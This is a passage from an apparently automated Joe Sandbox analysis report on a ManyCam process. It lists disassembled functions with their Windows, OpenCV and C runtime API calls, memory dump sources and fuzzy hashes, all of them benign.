_DebugHeapAllocator.LIBCPMTD ref: 0051297B

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

Part of subcall function 0050E580: wcscpy.MSVCR80 ref: 0050E5EC
Part of subcall function 0050E580: wcscpy.MSVCR80 ref: 0050E623

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$wcscpy
String ID:
API String ID: 147117728-0
Opcode ID: d0bbc9be73f287d5b3265cda2ea85270813d23556e8a0590b6fb4fd8d4f8cf1c
Instruction ID: 4db675f979ab1b4fcf933bf1fc0f7ec6c4e65dab18244cadebc46eb2865c177d
Opcode Fuzzy Hash: d0bbc9be73f287d5b3265cda2ea85270813d23556e8a0590b6fb4fd8d4f8cf1c
Instruction Fuzzy Hash: FF512AB0906259DFEB14DF58D899BAEBBB5BF48304F1042EDE409A7281C7385E44CF95

Function 00B92160 Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

cvLoadImage.HIGHGUI099(?,?), ref: 00B9218D
cvSetImageROI.CXCORE099(00000000), ref: 00B9221E
cvReleaseImage.CXCORE099(?), ref: 00B92240
cvReleaseImage.CXCORE099(?), ref: 00B92259

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Image$Release$Load
String ID:
API String ID: 1413804649-0
Opcode ID: a4d4840bee8ad4b3121e05d0b855a454b0eeaed213024734cef0bc68e88dd3e0
Instruction ID: 07eba4bbf48a00cfa4cfb7fa23020f4433ee28f934a4894164a0a1a2a2c118fc
Opcode Fuzzy Hash: a4d4840bee8ad4b3121e05d0b855a454b0eeaed213024734cef0bc68e88dd3e0
Instruction Fuzzy Hash: 6531EF76A04311AB8B08EF18C98082BB3E6EFC8714F1585BDE80997301DB31ED0ECB91

Function 00B912C0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 00B91230: AVIFileInit.AVIFIL32(00B91F21), ref: 00B91239

AVIFileOpenA.AVIFIL32(?,?,00000000,00000000), ref: 00B912E1
AVIFileGetStream.AVIFIL32(?,?,73646976,00000000,?,?,00000000,00000000), ref: 00B912FC
AVIStreamInfoA.AVIFIL32(00000000,?,0000008C,?,?,73646976,00000000,?,?,00000000,00000000), ref: 00B91316
AVIStreamGetFrameOpen.AVIFIL32(?,?,00000000), ref: 00B913A5

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: FileStream$Open$FrameInfoInit
String ID:
API String ID: 3655022341-0
Opcode ID: 30141c959b5a1cb2d77192d91f08592d99ce14860183f2cedb1a24cc689c9298
Instruction ID: c9c15c4f9f2709c36d756f59401894132b5ba95cc6128a274423aa9e852ccf27
Opcode Fuzzy Hash: 30141c959b5a1cb2d77192d91f08592d99ce14860183f2cedb1a24cc689c9298
Instruction Fuzzy Hash: 04319175600201ABDF04EF68CD81BA677E5EF48710F4485B9ED48CF34AEB35D9049BA5

Function 00406040 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00406080
_CIatan.MSVCR80 ref: 004060E0
_CIatan.MSVCR80 ref: 00406102
_CIatan.MSVCR80 ref: 00406126

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Iatan$Isqrt
String ID:
API String ID: 1025909456-0
Opcode ID: 57f5941b643651e987862c1e0d1d6f7d17b30a8860795f25dd51119af805d3df
Instruction ID: 369849f07fd1038270b353e5a516803fc2d99b3ba7736fd5bc0cfa9b85f71fc3
Opcode Fuzzy Hash: 57f5941b643651e987862c1e0d1d6f7d17b30a8860795f25dd51119af805d3df
Instruction Fuzzy Hash: 8631E671609302EFC701AF44E64816ABFA4FFC1751FA18D88E4E922199D73198758F8B

Function 00B99800 Relevance: 6.1, APIs: 4, Instructions: 81fileCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR80(000001B0), ref: 00B9981E
??2@YAPAXI@Z.MSVCR80(000000C4,000001B0), ref: 00B9982D
_setjmp3.MSVCR80 ref: 00B99857
fopen.MSVCR80 ref: 00B9987F

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@$_setjmp3fopen
String ID:
API String ID: 2836828308-0
Opcode ID: 83ad89e9acc0db619ab61287bb8d8b6e458a0f4023930257b46fb7cdadf3862e
Instruction ID: c0495488141cce935a3d74c3dcd7f25807248fb21dbc7bdf9e8c4d59f3c21e9b
Opcode Fuzzy Hash: 83ad89e9acc0db619ab61287bb8d8b6e458a0f4023930257b46fb7cdadf3862e
Instruction Fuzzy Hash: A421F871A41304AFD710EF698842BAEF7E8FF45700F0485EEE95897342D771AA118BE1

Function 00BC0EB0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BC0ED7
sprintf.MSVCR80 ref: 00BC0EED

Strings

sCAL, xrefs: 00BC0F14
%12.12e, xrefs: 00BC0ED1, 00BC0EE7

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: %12.12e$sCAL
API String ID: 590974362-3005958862
Opcode ID: c1fb173f87a4ff0b3b200c6d710552d2290fe47d9c5561a200db3cf18e243b88
Instruction ID: b81dc8953f4a8c41eba9f7d90a0a4a8a75d7bf1f6d9106cc4090cab603e297c2
Opcode Fuzzy Hash: c1fb173f87a4ff0b3b200c6d710552d2290fe47d9c5561a200db3cf18e243b88
Instruction Fuzzy Hash: 031151765147506B9204D668CC02CFFB7ECEEC5320F140A5EF5A2632D1EBE5EA0587AA

Function 00B91F00 Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

cvAlloc.CXCORE099(00000030), ref: 00B91F04
memset.MSVCR80 ref: 00B91F14

Part of subcall function 00B91230: AVIFileInit.AVIFIL32(00B91F21), ref: 00B91239

AVIFileOpenA.AVIFIL32(00000000,?,00001001,00000000), ref: 00B91F2E

Part of subcall function 00B91C60: memset.MSVCR80 ref: 00B91D14
Part of subcall function 00B91C60: AVIFileCreateStreamA.AVIFIL32(?,?,vids), ref: 00B91DCD

cvReleaseVideoWriter.HIGHGUI099(?), ref: 00B91F6F

Part of subcall function 00B91830: cvFree_.CXCORE099(00000000), ref: 00B91848

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: File$memset$AllocCreateFree_InitOpenReleaseStreamVideoWriter
String ID:
API String ID: 40045735-0
Opcode ID: 32b067c6baf9894d569aff6307ba045cc9a72d4a9612e151e579e8b997e2f2f9
Instruction ID: 843ec37f6b46f1c2461dfffe5d396cf8c2716da3e0d7c37e4f8ce5db59cc6ded
Opcode Fuzzy Hash: 32b067c6baf9894d569aff6307ba045cc9a72d4a9612e151e579e8b997e2f2f9
Instruction Fuzzy Hash: C411B2706053025FD620EF6C9941B6FB7E4EF84790F104DADF585C2281E730DD0597A6

Function 00B97AB0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcpy.MSVCR80(?,?,?), ref: 00B97AC8
fseek.MSVCR80 ref: 00B97AE7
fread.MSVCR80 ref: 00B97AFB
longjmp.MSVCR80(?,00000085), ref: 00B97B2C

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: freadfseeklongjmpmemcpy
String ID:
API String ID: 2772266533-0
Opcode ID: 66a454410df139e916a1d3114de1c8daf3fa2f1f73607deae27b503cff068178
Instruction ID: c7ff533b0e36389eb8176a1c0fbb0bb87a78d5bd795f470beb7a575b3d0a8707
Opcode Fuzzy Hash: 66a454410df139e916a1d3114de1c8daf3fa2f1f73607deae27b503cff068178
Instruction Fuzzy Hash: 7D118E71B10B10AFDB38CB29DC54E6BB3F9EB88714B04492DF98683740EA75F8448B50

Function 00446480 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 0044648F
GetWindow.USER32(00000000,00000002), ref: 004464A0
SendMessageW.USER32(00000000,?,?,?), ref: 004464BF
GetTopWindow.USER32(00000000), ref: 004464CF

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 0fc2dd0073c28b6c66ec9f54719fca97d74c0b9b452a9e8b98ab4c061e3703d5
Instruction ID: 5599d8aec985cfa69e8589d1268fc08193e69a2bbc754be235a44f600a99598a
Opcode Fuzzy Hash: 0fc2dd0073c28b6c66ec9f54719fca97d74c0b9b452a9e8b98ab4c061e3703d5
Instruction Fuzzy Hash: 9411FA75A00208FFDB04DFE8D944EAE77B9AB88300F10855EFA0697390D734AE05DB69

Function 00B93860 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

cvCreateImage.CXCORE099(?,?,?,?), ref: 00B93878
cvReleaseImage.CXCORE099 ref: 00B93895
??3@YAXPAX@Z.MSVCR80(?), ref: 00B938A1
??2@YAPAXI@Z.MSVCR80(00000004), ref: 00B938B1

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Image$??2@??3@CreateRelease
String ID:
API String ID: 387725118-0
Opcode ID: 33c0b4b4cfef9e54a189eedcd18104dc8b2f02f8c52caf8dacbe285785c2da59
Instruction ID: 0be49bc542f90994ee644d86914ce1eedcc1047e0ff562eaa9140680f065b820
Opcode Fuzzy Hash: 33c0b4b4cfef9e54a189eedcd18104dc8b2f02f8c52caf8dacbe285785c2da59
Instruction Fuzzy Hash: C8017CB25047019FE720DB28D941B17B7E9EF94B10F0589BAF49A83291EB70E845C761

Function 004223E0 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00422406

Part of subcall function 004232A0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004232B6

wcslen.MSVCR80 ref: 00422427
SendMessageW.USER32(?,0000104D,00000000,00000000), ref: 00422448
SendMessageW.USER32(?,0000100F,?,00000000), ref: 00422460

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: MessageSend$memsetwcslen
String ID:
API String ID: 1629969563-0
Opcode ID: 27b4e246d41088bd54c352e73dc6f3ec4014a33d544db1ace6c82cc66d73829c
Instruction ID: fd28faf10420b3e9cf0d4e7cd47fee78e406ddaa3a8982db2d9a389e17546391
Opcode Fuzzy Hash: 27b4e246d41088bd54c352e73dc6f3ec4014a33d544db1ace6c82cc66d73829c
Instruction Fuzzy Hash: F901E9B1D00208EBEB14DFD0EC8ABDEBBB5BB58704F044118F601AB391DB75A9058B95

Function 00B91250 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

AVIStreamGetFrameClose.AVIFIL32(?), ref: 00B91260
AVIStreamRelease.AVIFIL32(?), ref: 00B91270
AVIStreamRelease.AVIFIL32(?), ref: 00B91280
memset.MSVCR80 ref: 00B912AA

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Stream$Release$CloseFramememset
String ID:
API String ID: 1615332947-0
Opcode ID: 74f3bb1eb6318d52f922f36249a1ed8ee939f265a6e7ebd6d421ff97f4babc2f
Instruction ID: 762a8e4cc1b9c69aec5b08563090aa0d106c908424661a4f1329b589f4449029
Opcode Fuzzy Hash: 74f3bb1eb6318d52f922f36249a1ed8ee939f265a6e7ebd6d421ff97f4babc2f
Instruction Fuzzy Hash: 8AF017B1A00B009AC620AF2AD841E5BF7E9EFD1710F158E9FE5E9D7621E374A8408B51

Function 0041E370 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004E), ref: 0041E37B
GetSystemMetrics.USER32(0000004F), ref: 0041E386
GetSystemMetrics.USER32(0000004C), ref: 0041E391
GetSystemMetrics.USER32(0000004D), ref: 0041E3A2

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 22b1d73353d5bc3e7bbfce1216fdfc9bbe2c5f0851a8470d3ca0ef857e634515
Instruction ID: 0309d501508c84c491e30ef2097f10fb6b95fe06418acfa07dbdd42ca1e239de
Opcode Fuzzy Hash: 22b1d73353d5bc3e7bbfce1216fdfc9bbe2c5f0851a8470d3ca0ef857e634515
Instruction Fuzzy Hash: 69018078E00209AFE704DF94E8499ACBBB1FF58300F1482AAEE5997781DB702A54DB45

Function 00488730 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?,?), ref: 00488737
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?,?,0049A100), ref: 00488742
?erase@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@II@Z.MSVCP80(00000000,?,?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?), ref: 00488759
??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@ABV01@@Z.MSVCP80(?,?,?,00488724,7EC02BB4,0049A100,7EC02BB0,?,00487BE3,0049A0FC,-0000001C,?,0047AE82,?,00000000,?), ref: 00488766

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$Myptr@?$basic_string@_$??4?$basic_string@_?erase@?$basic_string@_V01@V01@@V12@
String ID:
API String ID: 3537912873-0
Opcode ID: 5056e8f042ebb5b06e388abe9d7013084b117bbf253dc20301d42485009f9af0
Instruction ID: 68c4d93e9c4a580dced358607109a40fa72366f08dc93a0fa3c65411e4fd161c
Opcode Fuzzy Hash: 5056e8f042ebb5b06e388abe9d7013084b117bbf253dc20301d42485009f9af0
Instruction Fuzzy Hash: 6CE01235200108AFEB14EF54EC58D99777BFB98391F008125FA0A8B362DB30AD44DB94

Function 00B985C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00B98610
memset.MSVCR80 ref: 00B98735

Strings

$, xrefs: 00B98648

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _setjmp3memset
String ID: $
API String ID: 847497011-3993045852
Opcode ID: 1a06700a312aa925aba508b1ab4504e69a8b554c5a861c46cf7b74cb6e60b044
Instruction ID: d96db83a22791587ae816de3f060dcbe1302dc0391860956656d7ad2f9fc3fa6
Opcode Fuzzy Hash: 1a06700a312aa925aba508b1ab4504e69a8b554c5a861c46cf7b74cb6e60b044
Instruction Fuzzy Hash: 6691B330A046048BDF349B78C8957BEB7E5EF92344F6448BED46AC7292DF789C448B52

Function 00B9B4B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00B9B500
memset.MSVCR80 ref: 00B9B609

Strings

VUUU, xrefs: 00B9B643

Memory Dump Source

